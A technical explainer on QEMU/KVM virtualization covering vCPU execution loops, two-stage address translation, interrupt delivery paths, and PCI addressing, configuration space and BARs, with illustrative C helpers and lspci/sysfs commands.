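Background
QEMU architecture
The complete QEMU and KVM architecture consists of three parts:
User space in VMX root mode (the QEMU process)
Kernel space in VMX root mode (the Linux KVM driver module)
The virtual machine runtime environment in VMX non-root mode (the guest)
VMX root and VMX non-root are the two modes a CPU gains once it supports hardware virtualization extensions (Intel VT-x):
VMX root mode is used by the host, that is, the system running the virtualization software. Privileged virtualization instructions can be executed in this mode, which gives full control over the CPU's virtualization behavior.
VMX non-root mode is used to run the guest OS. The guest runs normally in non-root mode, and the vast majority of its instructions execute directly on the physical CPU. Sensitive operations make the CPU leave non-root mode for root mode (a VM-Exit), where KVM or QEMU handles them.
Both VMX root and VMX non-root mode contain the four privilege levels ring 0 through ring 3.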
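QEMU process
In the QEMU/KVM architecture the QEMU process lives in user space in VMX root mode and has the following responsibilities:
Initializing the virtual machine's hardware environment:
Creating the virtual chipset (for example the PCI host bridge and the memory controller).
Creating and initializing virtual devices (disks, NICs, display adapters, input devices) according to the startup options (-device and so on).
Allocating and managing guest physical memory. QEMU maps the guest's physical memory into the virtual address space of the host process (using system calls such as mmap).
Device emulation and I/O request handling: while the VM is running, the QEMU main thread uses an event loop (the main loop) to watch for and handle several kinds of events:
Device I/O request events: when the guest issues an I/O request (PIO/MMIO) to a virtual device and triggers a VM-Exit, KVM hands the request to QEMU by returning from the KVM_RUN ioctl with the exit reason filled in.
Management command events: commands sent by the user through QEMU's management interfaces or QMP (QEMU Machine Protocol).
Host device events: for example incoming network data or a state change on a host device (such as a packet arriving on a tap device). QEMU reacts and emulates the corresponding device behavior.
For guest device I/O accesses, QEMU handles the request in user space through pre-registered device-model callbacks such as MemoryRegionOps, emulating what real hardware would do (returning a register value, performing DMA, raising an interrupt).
CPU thread management: QEMU creates a separate host thread for each virtual CPU (vCPU). The thread represents and schedules that vCPU's execution flow. Through the KVM driver, QEMU controls the CPU's virtualization behavior so that vCPU threads execute guest code directly on host CPUs.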
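Guest environment
The guest OS runs in VMX non-root mode and has its own user space and kernel:
QEMU and KVM are completely transparent to the guest OS: an unmodified guest OS runs normally inside the VM.
Each vCPU of the guest corresponds to one thread of the QEMU process on the host. With KVM and the host scheduler, these threads execute guest code directly on physical CPUs.
Guest memory addresses are translated through two layers of mapping:
GVA→GPA (guest virtual address → guest physical address): managed by the guest OS's own page tables.
GPA→HPA (guest physical address → host physical address): handled by Extended Page Tables (EPT) or shadow page tables maintained by the KVM driver.
Devices in the guest are presented by QEMU. At boot the guest OS enumerates them and loads the matching drivers.
At run time, when the guest talks to a device through I/O ports (PIO) or memory-mapped I/O (MMIO), KVM intercepts these sensitive operations (VM-Exit) and forwards the requests to QEMU in user space, which handles them.
KVM kernel driver
The KVM driver lives in Linux kernel space in VMX root mode and is exposed as a misc device (/dev/kvm). QEMU drives it through ioctl calls on that device, as the following sections describe.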
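QEMU virtualization
CPU virtualization
vCPU creation and initialization
QEMU starts one thread per vCPU and uses ioctl calls on /dev/kvm to build the VM and its vCPUs: KVM_CREATE_VM → KVM_CREATE_VCPU → mmap() of the vCPU fd to obtain the shared struct kvm_run (its size comes from KVM_GET_VCPU_MMAP_SIZE) → KVM_SET_REGS/KVM_SET_SREGS/KVM_SET_MSRS … Once registers, CPUID and features are initialized, the thread enters its main loop.
Execution loop and VM-Exit/VM-Entry
The vCPU thread repeatedly calls ioctl(KVM_RUN) to enter the guest (VM-Entry). When a sensitive event or condition occurs, the hardware triggers a VM-Exit back to the host. Typical causes are PIO (I/O instructions), MMIO, CPUID/MSR accesses, HLT, interrupt windows, and EPT faults or permission violations. KVM writes the exit reason into struct kvm_run; QEMU reads it, dispatches the work (device callback, interrupt injection, resume, and so on), and then calls KVM_RUN again (VM-Entry).
Simplified pseudocode:
```c
for (;;) {
    ioctl(vcpu_fd, KVM_RUN, 0);          /* VM-Entry; returns on the next VM-Exit */
    switch (run->exit_reason) {          /* run: the mmap()ed struct kvm_run */
    case KVM_EXIT_MMIO: qemu_mmio_dispatch(run->mmio); break;  /* placeholder dispatch helper */
    case KVM_EXIT_IO:   qemu_pio_dispatch(run->io);    break;  /* placeholder dispatch helper */
    case KVM_EXIT_HLT:  break;           /* a real loop would idle or stop the vCPU here */
    }
}
```
VMCS/VMCB
Intel VT-x uses a VMCS to hold the guest and host state of each vCPU (the AMD SVM counterpart is the VMCB). This is not a kernel stack switch of the kind a system call performs; it is a hardware virtualization state switch: on VM-Entry and VM-Exit the CPU loads guest or host state from, and saves it to, the VMCS/VMCB.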
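Memory virtualization
```
Guest process        Guest kernel          QEMU (userspace)       Host kernel (KVM)       DRAM
   GVA ──►(guest PT)──► GPA ──►(EPT/NPT)──► HPA   (HVA is used only for user-space management/copies)
    │                    │                     ▲
    │                    └─MMIO (unmapped / device region)─┘  ← VM-Exit → QEMU MemoryRegionOps callbacks
    │
    └─IOVA (optional, with a vIOMMU)──►(vIOMMU mapping)──►GPA───►(EPT/NPT)──►HPA
```
Kinds of memory address
GVA (Guest Virtual Address): the virtual address a guest process sees, governed by page tables the guest kernel maintains (the page-table root that CR3 points to).
GPA (Guest Physical Address): the "physical address" from the guest's point of view. The guest kernel allocates and manages it, but it is really just an address in the guest physical address space.
HVA (Host Virtual Address): a virtual address in host user space (the QEMU process). QEMU obtains it with mmap() and uses it to back the guest's "physical memory".
HPA (Host Physical Address): a real physical address on the host.
The hardware address translation that actually runs guest instructions knows nothing about HVAs.
When the CPU accesses memory inside the guest, it follows only this chain:
GVA (guest virtual) → [guest page tables] → GPA (guest physical) → [EPT/NPT (second-level page tables)] → HPA (host physical)
An HVA is just a pointer inside the QEMU user-space process. QEMU and KVM use it for management, fault handling and user-space copies; it is not part of the hardware translation chain.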
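Initializing the memory structures
QEMU allocates host user-space memory
Using mmap() (backed by a hugetlbfs file, anonymous memory, memfd, and so on), QEMU creates a contiguous HVA region in its own address space to back the guest's "physical memory".
QEMU maintains MemoryRegion/AddressSpace
QEMU's Memory API abstracts RAM regions and I/O regions as MemoryRegion objects and composes them into the guest's GPA address-space layout.
Telling KVM: memory slots (memslots)
Through the KVM_SET_USER_MEMORY_REGION ioctl, QEMU registers a number of GPA ranges with KVM, each with its HVA start address and size. Each registration forms a memslot.
The key fields of a memslot are: slot number, guest_phys_addr (GPA start), memory_size, userspace_addr (HVA start), and flags (for example dirty-page logging).
The number of memslots is limited by the kernel. KVM_CAP_NR_MEMSLOTS reports the actual limit (historically a few hundred on x86, considerably larger on recent kernels, so query it rather than assume). In production the RAM is usually merged into a few large regions, which simplifies management and migration.
Dynamic updates
If QEMU later changes the memory layout (hot-plug, an I/O BAR being remapped, and so on), it calls KVM_SET_USER_MEMORY_REGION again to update the memslots. KVM uses mechanisms such as SRCU to keep concurrent readers safe.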
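To make the memslot idea concrete, the following sketch shows how a GPA can be resolved to an HVA by scanning a slot table. It is a simplified illustration, not KVM's implementation: `memslot_t` and `gpa_to_hva()` are hypothetical names that only mirror the fields listed above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the memslot fields described in the text. */
typedef struct {
    uint32_t slot;             /* slot number */
    uint32_t flags;            /* e.g. dirty-page logging */
    uint64_t guest_phys_addr;  /* GPA start */
    uint64_t memory_size;      /* size in bytes */
    uint64_t userspace_addr;   /* HVA start */
} memslot_t;

/* Resolve a GPA to an HVA by linear scan over the slots.
 * Returns 0 and stores the HVA on success, or -1 when no slot covers
 * the GPA (which is how a device MMIO address would look). */
int gpa_to_hva(const memslot_t *slots, size_t n, uint64_t gpa, uint64_t *hva)
{
    assert(slots != NULL && hva != NULL);
    for (size_t i = 0; i < n; i++) {
        const memslot_t *s = &slots[i];
        if (gpa >= s->guest_phys_addr &&
            gpa - s->guest_phys_addr < s->memory_size) {
            *hva = s->userspace_addr + (gpa - s->guest_phys_addr);
            return 0;
        }
    }
    return -1;
}
```

A GPA that falls in no slot is exactly the case where an access ends up as an MMIO exit handled by QEMU rather than as a RAM access.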
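Memory address translation
```
Guest' processes
                     +--------------------+
Virtual addr space   |                    |
                     +--------------------+
                     |                    |
                     \__   Page Table     \__
                        \                    \
                         |                    |  Guest kernel
                    +----+--------------------+----------------+
Guest's phy. memory |    |                    |                |
                    +----+--------------------+----------------+
                    |                                          |
                    \__                                        \__
                       \                                          \
                        |             QEMU process                 |
                   +----+------------------------------------------+
Virtual addr space |    |                                          |
                   +----+------------------------------------------+
                   |                                               |
                    \__                Page Table                   \__
                       \                                               \
                        |                                               |
                   +----+-----------------------------------------------++
Physical memory    |    |                                               ||
                   +----+-----------------------------------------------++
```
Guest page tables: GVA → GPA
Maintained by the guest OS itself (the page tables that the guest CR3, gCR3, points to). The mechanism is the same as on bare metal (4K/2M/1G pages, LA57, SMEP/SMAP, and so on).
Second-level page tables (hardware/KVM): GPA → HPA
Intel calls them EPT, AMD calls them NPT. They support 4K/2M/1G second-level pages, and RAM mappings usually use the Write-Back memory type.
When a GPA is touched for the first time, or the access violates the mapped permissions, an EPT/NPT violation (a second-level page fault) occurs and triggers a VM-Exit. KVM then creates or fixes the mapping and re-enters the guest.
When the guest executes a memory access instruction, the process is usually as follows.
Fast path: TLB hit (hardware resolves it in one step)
If the same address was accessed recently and the TLB already holds the combined entry, the CPU does this while in the guest: GVA ──TLB hit──► HPA → read/write DRAM directly.
The TLB entry is effectively the combined GVA→HPA result (it caches both translation stages), so no page table is consulted and no VM-Exit happens.
The HVA does not appear at all; the hardware does not know about it.
Slow path (first access / TLB miss)
On a TLB miss the hardware performs a two-stage translation. Note that every step of reading the guest page tables themselves also goes through EPT/NPT.
Guest page tables translate GVA → GPA (still in VMX non-root mode, done by hardware)
Taking x86-64 four-level paging as an example (PML4→PDPT→PD→PT), the hardware:
reads gCR3 to get the guest page-table root (a GPA);
reads the PML4E, PDPTE, PDE and PTE in turn. These entries live in guest physical memory, so each read (which uses a GPA) in turn goes through the EPT step below to obtain the corresponding HPA;
obtains the final GPA (or the GPA of a large page).
If an entry at some level is not present or the permissions do not match, the CPU raises #PF (page fault) inside the guest and the guest kernel handles it (still in non-root mode; KVM is not involved unless interception was configured deliberately).
Second-level page tables translate GPA → HPA (with a VM-Exit if needed)
The hardware performs the second-level translation using the EPT pointer (EPTP) in the VMCS, or the nested page-table root (nCR3) in the VMCB. If the mapping exists, the access completes without leaving the guest. If it is missing or the permissions do not allow the access, an EPT/NPT violation triggers a VM-Exit, KVM looks up the memslot covering the GPA, resolves the backing host page, installs the second-level entry, and resumes the guest.
So the hardware's real memory accesses only ever reach HPAs. The HVA is used only as the clue for finding the physical page at the moment KVM builds or modifies the EPT, and as an ordinary pointer when QEMU does a memcpy() in user space.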
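The slow path can be quantified with a small sketch. The first function splits a 48-bit virtual address into the four 9-bit table indices used by x86-64 four-level paging; the second computes the worst-case number of memory references in a two-dimensional (nested) walk, using the standard (g + 1)(h + 1) - 1 count for g guest levels and h second-level levels. The names `va_split_t`, `split_va()` and `nested_walk_refs()` are made up for this illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Indices into each level of a 4-level x86-64 page table (9 bits each)
 * plus the 12-bit offset inside a 4 KiB page. */
typedef struct {
    unsigned pml4, pdpt, pd, pt, offset;
} va_split_t;

va_split_t split_va(uint64_t va)
{
    va_split_t s;
    s.pml4   = (unsigned)((va >> 39) & 0x1FF);
    s.pdpt   = (unsigned)((va >> 30) & 0x1FF);
    s.pd     = (unsigned)((va >> 21) & 0x1FF);
    s.pt     = (unsigned)((va >> 12) & 0x1FF);
    s.offset = (unsigned)(va & 0xFFF);
    return s;
}

/* Worst-case memory references for one nested walk without any caching:
 * each of the g guest table reads, plus the final data GPA, needs an
 * h-level second-level walk ((g + 1) * h reads), and the g guest table
 * entries themselves must be read as well. Total: (g + 1) * (h + 1) - 1. */
unsigned nested_walk_refs(unsigned guest_levels, unsigned host_levels)
{
    assert(guest_levels > 0 && host_levels > 0);
    return (guest_levels + 1) * (host_levels + 1) - 1;
}
```

With four guest levels and four EPT/NPT levels the count is 24 references, compared with 4 for a native walk, which is why TLB hits and large pages matter so much for guests.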
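Device virtualization
The goal of device virtualization in QEMU is to let the guest see devices that look real, while trading off functionality, performance and migratability. The control plane relies on PIO/MMIO and the data plane on DMA. At run time a device access causes a VM-Exit and is handled by QEMU (or by a fast path).
QEMU implements device virtualization in three main ways:
Full emulation (QEMU device model): device registers are exposed through PIO/MMIO; every access causes a VM-Exit and is handled by a QEMU callback.
Paravirtualization (the virtio family): data is passed through shared virtqueue rings, which greatly reduces the number of traps. The data plane can be moved into vhost (in the kernel) or vhost-user (an external process such as DPDK, SPDK or virtiofsd), or run directly by hardware or the kernel through vDPA.
Passthrough (VFIO, including SR-IOV VFs): the device is assigned directly to the VM, with the IOMMU isolating DMA. Performance is close to bare metal.
Interrupt virtualization
Interrupt controllers
There are two main kinds of interrupt controller:
Intel 8259 (PIC): the legacy programmable interrupt controller from the uniprocessor era (IRQ0 to IRQ15).
I/O APIC + LAPIC: the mainstream combination of the SMP era:
IOAPIC: sits on the chipset side and routes device interrupts to CPU interrupt vectors.
LAPIC: the local APIC of each vCPU, responsible for receiving and delivering interrupts. In x2APIC mode it is accessed through MSRs instead of MMIO, which is faster, and the APIC ID space is larger.
QEMU can emulate the 8259/IOAPIC/LAPIC in user space, or use KVM's in-kernel irqchip to emulate them in the kernel and reduce VM-Exits. The corresponding command-line option (x86) is -machine kernel-irqchip=on|off|split
on: the 8259/IOAPIC/LAPIC are all emulated in the kernel (best performance, recommended).
off: everything is emulated by QEMU in user space (easy to debug, lowest performance).
split: usually the LAPIC is in the kernel and the IOAPIC/PIC in user space; used for compatibility and migration scenarios (behavior depends on platform and version).
Interrupt types
Three kinds of interrupt are virtualized: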
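| Type | Trigger | Controllers involved | Characteristics | Use |
| --- | --- | --- | --- | --- |
| INTx | Level-triggered lines (INTA to INTD), shared | IOAPIC → LAPIC (possibly through the PIC first) | The line can stick asserted and must be cleared around EOI; prone to jitter | Compatibility fallback |
| MSI | The device writes a memory message (MSI address/data) | Straight to the LAPIC | Few vectors, but already better than INTx | Older drivers/devices |
| MSI-X | Same as MSI, but with an independent table entry per queue | Straight to the LAPIC | Many vectors (one per queue); most robust and fastest | Strongly recommended (multi-queue network/block) |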
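INTx with kernel-irqchip=off (everything in QEMU, slowest)
Raise: the emulated QEMU device calls pci_set_irq(dev, level=1) to assert the interrupt.
Route: QEMU consults and updates the virtual IOAPIC's redirection table (target vCPU, trigger mode, vector).
Deliver: QEMU injects the interrupt into the vCPU through a KVM ioctl (user space to kernel, then into the vCPU).
EOI: the guest writes EOI to the LAPIC → VM-Exit to QEMU → QEMU updates the LAPIC/IOAPIC state → back to the vCPU. Every step may involve a VM-Exit or a user-space round trip, so performance is the worst.
INTx with kernel-irqchip=on (everything in the kernel, much faster)
Raise:
The emulated QEMU device can bind an eventfd to a GSI through irqfd; when the device fires, it writes 1 to the eventfd.
The in-kernel KVM irqchip receives the eventfd signal and updates the IOAPIC/PIC state inside the kernel.
Route/Deliver: the kernel looks up the IOAPIC table and delivers directly to the target vCPU's LAPIC.
EOI: the guest's LAPIC EOI write is handled in the kernel and no longer exits to QEMU. QEMU takes no part in injection or EOI, so latency drops sharply. (Without irqfd, QEMU can still inject with KVM_IRQ_LINE, which remains faster than the all-user-space path.)
MSI-X + irqfd (common for virtio/vhost/VFIO, fastest)
Raise: sending an MSI-X interrupt is essentially one memory write of the data value to the APIC target address.
Emulated device: QEMU can call kvm_irqchip_send_msi() directly (KVM_SIGNAL_MSI).
vhost/VFIO: each interrupt vector is bound to an irqfd (eventfd), which the backend or the hardware triggers.
Route/Deliver: the KVM kernel code uses the MSI routing table (GSI routing) to deliver the interrupt straight to the target vCPU's LAPIC, without exiting to QEMU.
EOI: the guest's LAPIC EOI is handled in the kernel (with hardware APICv or posted interrupts, exits are reduced further). Message-signaled interrupts + in-kernel irqchip + irqfd is the usual optimal path.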
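Since an MSI or MSI-X interrupt is just a memory write, the address/data pair can be composed by hand. The sketch below assumes the usual x86 encoding: address bits 31:20 are 0xFEE, bits 19:12 carry the destination APIC ID, and the low 8 data bits carry the vector (fixed delivery, edge-triggered, physical destination mode when the other bits are zero). `msi_msg_t` and the helper names are hypothetical; KVM's own `struct kvm_msi` carries the same address_lo/address_hi/data triple.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical container for the message a device would write. */
typedef struct {
    uint32_t address_lo;  /* low 32 bits of the target address */
    uint32_t data;        /* value written to that address */
} msi_msg_t;

/* Compose a fixed-delivery, edge-triggered MSI message for an
 * 8-bit (xAPIC) destination ID in physical destination mode. */
msi_msg_t msi_compose(uint8_t dest_apic_id, uint8_t vector)
{
    msi_msg_t m;
    assert(vector >= 0x10);  /* vectors 0..15 are not valid for fixed delivery */
    m.address_lo = 0xFEE00000u | ((uint32_t)dest_apic_id << 12);
    m.data = vector;         /* delivery mode bits 10:8 = 000 (fixed) */
    return m;
}

/* Decode the fields back out of a message. */
uint8_t msi_dest_id(msi_msg_t m) { return (uint8_t)((m.address_lo >> 12) & 0xFF); }
uint8_t msi_vector(msi_msg_t m)  { return (uint8_t)(m.data & 0xFF); }
```

In the in-kernel path described above, KVM performs this decoding itself when an irqfd fires or KVM_SIGNAL_MSI is called, which is why no exit to QEMU is needed.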
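PCI devices
PCI (Peripheral Component Interconnect) is a standard bus and software model connecting the host and its peripherals. It has evolved over time:
PCI (parallel) → PCI-X (parallel, servers) → PCIe (PCI Express, serial point-to-point).
The software model carries over: all generations have configuration space, BARs (Base Address Registers), interrupts and DMA. PCIe changes the physical and link layers and adds or standardizes many capabilities (MSI/MSI-X, hot-plug, error reporting, power saving, and so on).
Think of the motherboard as a city:
CPU / Root Complex = city hall
PCIe Root Ports / switches = interchanges
Devices (NICs, GPUs, NVMe drives, FPGAs…) = office buildings (Endpoints)
After power-on, city hall (the Root Complex) connects every building to fiber (link training: speed/width negotiation), takes inventory of each building (configuration space), assigns street numbers (BDF: Bus:Device.Function) and plots of land (BARs: mappable address ranges), and finally issues work permits (Bus Master) and phone extensions (interrupts: MSI/MSI-X). After that:
when a device needs to read or write memory, it hauls the goods itself via DMA;
when the work is done, it calls the extension (MSI-X) to notify the CPU;
the CPU's driver answers the call and hands out the next task.
That is the daily life of a PCI device inside a machine.
A typical PCIe topology:
```
CPU / Root Complex
 ├─ Root Port 0 ──[Switch]── NVMe(0000:65:00.0)
 └─ Root Port 1 ── GPU(0000:03:00.0)
```
Every function has a BDF (domain:bus:device.function), for example 0000:65:00.0.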
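BDF/DBDF addressing
BDF/DBDF address format
Every PCI device is identified by an address in BB:DD.F format. The BDF is determined by enumeration order and by how the bridges partition the bus numbers. Adding or removing devices, changing slots, upgrading the BIOS, or re-enumerating a bridge or Root Port can all change the bus number and even the device number. On the same machine with the same topology, however, BDFs are usually stable.
BDF: BB:DD.F
Bus (BB, bus number): 8 bits → 0..255 (displayed as 00..ff)
Device (DD, device/slot number): 5 bits → 0..31 (at most 32 device numbers per bus)
Function (F, function number): 3 bits → 0..7 (at most 8 functions per device number)
One PCI device (a single DD) can have up to 8 functions (F=0..7); such a device is called a multi-function device:
Typical example: 00:1f.0 LPC, 00:1f.2 SATA, 00:1f.3 SMBus … under the PCH (southbridge). They share device number 1f and differ in function number.
Whether a device is multi-function is decided by bit 7 of Function 0's Header Type (1 = multi-function).
Drivers bind per Function: each Function has its own configuration space (and possibly a different Vendor/Device ID).
DBDF: DDDD:BB:DD.F
Domain/Segment (DDDD): 16 bits → 0..FFFF (usually 0000; it can be greater than 0 with multiple PCIe Root Complexes, complex NUMA systems, accelerator cards or passthrough setups)
For example:
00:1f.2 = bus 0, device 31, function 2;
0000:65:00.0 = 65:00.0 in domain 0.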
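The address format is easy to handle in code. The following sketch parses either the short BB:DD.F form or the full DDDD:BB:DD.F form, range-checks each field against the bit widths given above, and formats the result back as a full DBDF string. `pci_addr_t`, `pci_addr_parse()` and `pci_addr_format()` are illustrative names, not an existing library API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

typedef struct {
    unsigned domain;  /* 16 bits */
    unsigned bus;     /*  8 bits */
    unsigned dev;     /*  5 bits */
    unsigned fn;      /*  3 bits */
} pci_addr_t;

/* Parse "DDDD:BB:DD.F" or "BB:DD.F" (hex fields).
 * Returns 0 on success, -1 on a malformed or out-of-range address. */
int pci_addr_parse(const char *s, pci_addr_t *out)
{
    unsigned d = 0, b = 0, dv = 0, f = 0;
    char tail;

    assert(s != NULL && out != NULL);
    if (sscanf(s, "%x:%x:%x.%x%c", &d, &b, &dv, &f, &tail) != 4) {
        /* Not a full DBDF; retry as a short BDF in domain 0. */
        d = 0;
        if (sscanf(s, "%x:%x.%x%c", &b, &dv, &f, &tail) != 3)
            return -1;
    }
    if (d > 0xFFFF || b > 0xFF || dv > 0x1F || f > 0x7)
        return -1;
    out->domain = d;
    out->bus = b;
    out->dev = dv;
    out->fn = f;
    return 0;
}

/* Format as the full DBDF string; returns what snprintf returns. */
int pci_addr_format(const pci_addr_t *a, char *buf, size_t len)
{
    return snprintf(buf, len, "%04x:%02x:%02x.%x",
                    a->domain, a->bus, a->dev, a->fn);
}
```

The trailing `%c` in each format string is there only to reject input with extra characters after the function number.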
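lspci may omit the leading 0000: by default; -D forces the domain to be shown: lspci -D -s 65:00.0. Other commonly used commands:
Always show the domain number: lspci -D
Show the tree: lspci -t (or lspci -tv)
Show the driver and kernel modules: lspci -k
BDF and machine topology
PCIe has a tree topology: Root Complex → Root Port → (optional) Switch → Endpoint. lspci -t (or -tv) shows the device tree, for example:
```
-+-[0000:65]-+-00.0  (Root Port)
 |           \-00.1  (Root Port)
 \-[0000:66]-+-00.0  (Switch Upstream)
             \-[0000:67]-00.0  (your NIC, 67:00.0)
```
Here the 67 in 67:00.0 is the secondary bus number that the bridge above assigned to it.
Every bridge level (a PCI-to-PCI bridge, Root Port or switch port) has three bus-number registers that are configured during enumeration:
Primary Bus (the upstream bus the bridge itself sits on)
Secondary Bus (the bus number immediately downstream of the bridge)
Subordinate Bus (the highest bus number anywhere downstream of the bridge)
During enumeration the firmware or OS:
assigns each bridge its Secondary/Subordinate bus-number range;
assigns Device numbers (0..31) to the devices attached within that range and probes their Functions;
so the Bus number depends on how the bridges partition the range, while Device/Function are unique within that Bus.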
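Mapping DBDF to the file system
sysfs and procfs each expose PCI devices through their own interface, and the two are not the same directory: sysfs uses /sys/bus/pci/devices/DDDD:BB:DD.F/, procfs uses /proc/bus/pci/BB/DD.F.
BDF and configuration space access
Accessing configuration space always requires the four-tuple Bus/Device/Function/Offset to index the target Function, whether the access goes through the legacy port pair at 0xCF8/0xCFC or through memory-mapped ECAM.
In other words, the BDF is both a name and a set of access coordinates. The Domain/Segment comes from the ACPI MCFG table, which gives a separate ECAM base address per segment; it is not part of the Requester ID of an individual PCIe transaction (which contains only Bus/Device/Function).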
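How the four-tuple turns into an actual address can be shown in a few lines. The sketch below computes an ECAM address (4 KiB per function, bus in bits 27:20, device in 19:15, function in 14:12), the value written to port 0xCF8 for the legacy mechanism (enable bit 31, dword-aligned register offset), and the 16-bit Requester ID. The function names and the ECAM base used in the checks are assumptions for illustration; a real base comes from the MCFG table.

```c
#include <assert.h>
#include <stdint.h>

/* Memory address of a config register under ECAM. */
uint64_t ecam_address(uint64_t ecam_base, unsigned bus, unsigned dev,
                      unsigned fn, unsigned off)
{
    assert(bus <= 0xFF && dev <= 0x1F && fn <= 0x7 && off <= 0xFFF);
    return ecam_base + (((uint64_t)bus << 20) | ((uint64_t)dev << 15) |
                        ((uint64_t)fn << 12) | off);
}

/* Value for the CONFIG_ADDRESS port (0xCF8); data then moves via 0xCFC.
 * Only the first 256 bytes of config space are reachable this way. */
uint32_t cf8_address(unsigned bus, unsigned dev, unsigned fn, unsigned off)
{
    assert(bus <= 0xFF && dev <= 0x1F && fn <= 0x7 && off <= 0xFF);
    return 0x80000000u | ((uint32_t)bus << 16) | ((uint32_t)dev << 11) |
           ((uint32_t)fn << 8) | ((uint32_t)off & 0xFCu);
}

/* 16-bit Requester ID carried in PCIe transactions (no domain). */
uint16_t requester_id(unsigned bus, unsigned dev, unsigned fn)
{
    assert(bus <= 0xFF && dev <= 0x1F && fn <= 0x7);
    return (uint16_t)((bus << 8) | (dev << 3) | fn);
}
```

Note that the domain never enters these computations except through the choice of `ecam_base`, which matches the statement above that the segment selects an ECAM window rather than appearing in the transaction.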
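Configuration space
Configuration space is essentially a set of registers inside the device, used to enumerate, identify and configure it. The operating system sends read/write requests to the device through a configuration access mechanism, and the device returns the contents of these registers.
Configuration space layout
Conventional PCI has a 256 B configuration space. PCIe extends it to 4 KiB per function: the first 256 B stay compatible, and offsets 0x100 to 0xFFF form the extended configuration space. The layout is as follows:
Standard header (first 64 B)
Common fields:
Vendor ID / Device ID: identify the vendor and the device;
Command (control bits): bit0 I/O Space, bit1 Memory Space, bit2 Bus Master (must be set for DMA)…
Status: error and capability-support status bits;
Class Code/Subclass/ProgIF: device class (NIC, storage, bridge…);
Header Type: 0 = endpoint, 1 = bridge, 2 = CardBus;
BAR0..BAR5: up to 6 base address registers (Endpoint header type);
Capabilities Pointer: points to the capability list (PM, MSI, MSI-X, PCIe Cap…).
PCIe extended capabilities
These live in a linked list in the extended configuration space (for example AER, ACS, ARI, SR-IOV, ATS/PRI/PASID, L1 Substates…).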
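Viewing configuration space
Passing a BDF address to lspci with -s shows the configuration space information of that device (add -vv for decoded fields or -xxxx for a hex dump).
Under the hood this information comes from the config file in the device's sysfs PCI directory:
```
sudo cat /sys/bus/pci/devices/0000:65:00.0/config | xxd
```
The procfs PCI interface also exposes the configuration space:
```
sudo cat /proc/bus/pci/65/00.0 | xxd
```
BAR registers
BAR (Base Address Register) = base address register.
A device uses a BAR to declare that it needs an address window towards the outside (in either I/O space or memory space). The operating system then carves out a non-conflicting range in the system address space and writes the base address back into the BAR. After that:
the CPU reaches device registers or buffers by accessing base + offset (MMIO or PIO);
the device's internal address decoder sees the address range and routes the transaction to the corresponding register or memory array.
Different kinds of PCI device have different numbers of BARs: a Type 0 header (endpoint) has six, BAR0..BAR5, while a Type 1 header (bridge) has only two.
BAR register layout
I/O BAR (port I/O, mainly on x86)
bit0=1 marks an I/O space (PIO) BAR;
bits[31:2] hold the port base address (bit 1 is reserved, so the base is at least 4-byte aligned);
Memory BAR (memory-mapped I/O, MMIO)
bit0=0 marks a memory BAR;
bits[2:1] give the type (00 = 32-bit, 10 = 64-bit, which occupies two consecutive BARs);
bit3 is the prefetchable flag;
the remaining high bits, from bit 4 upwards, hold the base address.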
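A raw BAR value can be decoded with a few bit tests. The sketch below assumes the standard encoding: bit 0 distinguishes I/O from memory; for memory BARs bits 2:1 give the type (binary 10 means 64-bit, with the upper half in the next BAR) and bit 3 marks prefetchable memory. It also shows the usual sizing rule: after writing all ones to a BAR, the size is the two's complement of the read-back value with the flag bits masked off. `bar_info_t`, `bar_decode()` and `bar_size_from_probe()` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    int is_io;          /* 1 = I/O BAR, 0 = memory BAR */
    int is_64bit;       /* memory BAR spanning two registers */
    int prefetchable;   /* memory BAR without read side effects */
    uint64_t base;      /* decoded base address */
} bar_info_t;

/* Decode a BAR; 'hi' is the following register, used only for 64-bit BARs. */
bar_info_t bar_decode(uint32_t lo, uint32_t hi)
{
    bar_info_t b = {0, 0, 0, 0};

    if (lo & 0x1u) {                       /* I/O BAR */
        b.is_io = 1;
        b.base = lo & ~0x3u;
        return b;
    }
    b.is_64bit = ((lo >> 1) & 0x3u) == 0x2u;
    b.prefetchable = (int)((lo >> 3) & 0x1u);
    b.base = lo & ~0xFu;
    if (b.is_64bit)
        b.base |= (uint64_t)hi << 32;
    return b;
}

/* Size of a 32-bit memory BAR from the value read back after writing
 * 0xFFFFFFFF to it (the device hard-wires the low address bits to 0). */
uint32_t bar_size_from_probe(uint32_t readback)
{
    uint32_t mask = readback & ~0xFu;
    assert(mask != 0);                     /* 0 means the BAR is unimplemented */
    return ~mask + 1u;
}
```

For example, a read-back of 0xFFFF0000 after the probe write means the BAR decodes a 64 KiB window.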
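Viewing BAR registers
lspci also shows the state of the BAR registers.
/sys/bus/pci/devices/0000:65:00.0/resource is the summary table of all address resources the kernel finally assigned to this PCI device. It lists in one place which address ranges this function currently occupies, with three columns per line: start address, end address (inclusive) and flags. The lines mainly come from the assignment results of BAR0..BAR5 (plus the optional Expansion ROM). If the device is a bridge, the file also contains the bridge windows (I/O window, non-prefetchable MEM window, prefetchable MEM window) and so on.
Each line of resource has the format:
```
<start_phys_addr> <end_phys_addr> <flags>
```
resource0…resourceN: the files resource0, resource1… in the same directory expose each line (Memory BARs in particular) as a separate node:
The resourceX of a Memory BAR can be mmap()ed (common for user-space debugging) to access device registers or windows directly;
the lines of an I/O BAR (port I/O) cannot be mmap()ed (they are not memory) and must be accessed with in/out instructions.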
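Communication methods
PIO (Port I/O)
PIO uses the I/O port address space that is specific to x86 (separate from the memory address space, at most 64K ports). For a device to communicate through PIO:
The device's I/O BAR (lowest BAR bit set to 1) indicates that it uses I/O space.
I/O port accesses only take effect once Command.bit0 = 1 (I/O Space Enable).
/proc/ioports is the occupancy list of the I/O port address space. It lists PIO port ranges, usually the ones that drivers registered through request_region() (for example 0x3f8-0x3ff : serial, 0xcf8-0xcff : PCI conf1). Port ranges that were never registered may not show up.
Port-mapped I/O (x86 port I/O) has no notion of a physical memory address, only I/O port numbers (0 to 0xFFFF on x86). Ports are accessed with in/out instructions or through /dev/port; they cannot be mmap()ed into a user virtual address and do not appear in /proc/pagemap.
The CPU accesses these ports with in/out instructions.
The x86 IN/OUT instruction family uses 16-bit port numbers (I/O address space 0..65535), and the data width is limited to 8/16/32 bits (there is no 64-bit form).
inb/outb ⇒ 8 bits (AL)
inw/outw ⇒ 16 bits (AX)
inl/outl ⇒ 32 bits (EAX; the 32-bit form is used on x86-64 as well)
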